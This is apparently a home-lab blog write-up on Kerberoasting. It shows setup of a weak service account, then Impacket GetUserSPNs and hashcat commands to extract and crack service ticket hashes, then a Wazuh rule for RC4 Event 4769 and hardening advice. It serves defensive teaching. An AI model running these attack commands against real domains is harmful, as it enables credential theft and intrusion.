June 7, 2026

Kerberoasting: Attack, Detect, and Defend

Full red-blue exercise: executing Kerberoasting in my AD home lab and building Wazuh detection rules to catch it in real time.

What is Kerberoasting?

Kerberoasting is a post-exploitation technique: an attacker holding any valid domain account requests Kerberos service tickets (TGS) for accounts that have Service Principal Names (SPNs) and cracks them offline. It works because each service ticket is encrypted with the service account's password hash, so a weak password can be recovered from the ticket without ever touching the account or generating a failed logon.

This lab was performed in a fully isolated home environment. Never attempt this on networks you do not own.

Lab Environment

  • Attacker: Kali Linux + Impacket
  • Victim: Windows Server 2022 AD with a weak service account
  • Defender: Wazuh SIEM monitoring DC event logs

Setup: Creating a Vulnerable Service Account

```powershell
# Create a service account with a deliberately weak password for the lab
New-ADUser -Name 'svc-webapp' -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Enabled $true
# Register an SPN on the account so it becomes a Kerberoasting target
setspn -a HTTP/webapp.lab.local svc-webapp
```

The Attack

```bash
# Request a service ticket for every user account that has an SPN and write the hashes out
python3 GetUserSPNs.py lab.local/user:Pass -dc-ip 192.168.1.10 -request -outputfile hashes.txt
# Crack them offline; mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
```

Detection with Wazuh

Every service ticket request is logged on the DC as Event ID 4769. A TicketEncryptionType of 0x17 (RC4-HMAC) is the giveaway, because the tooling asks for RC4 tickets on purpose: they crack far faster than AES ones. Expect some legitimate 0x17 traffic from legacy services until RC4 is actually disabled, so baseline first.

```xml
<group name="windows,kerberos,">
  <!-- Wazuh rule files must wrap rules in a group; the group name here is arbitrary -->
  <rule id="100010" level="12">
    <field name="win.system.eventID">^4769$</field>
    <field name="win.eventdata.ticketEncryptionType">^0x17$</field>
    <description>Kerberoasting: RC4 ticket requested</description>
    <mitre><id>T1558.003</id></mitre>
  </rule>
</group>
```

Enforcing AES-256 for all service accounts removes the RC4 tickets that crack quickly; AES tickets can still be attacked offline, only far more slowly, which is why long service account passwords remain essential. RC4 should be disabled org-wide.

Key Takeaways

  • Detection must happen on the DC via Windows event logs
  • Kerberoasting is invisible to network-level monitoring
  • Fix: disable RC4, use 25+ char service account passwords, audit SPNs
  • MITRE ATT&CK: T1558.003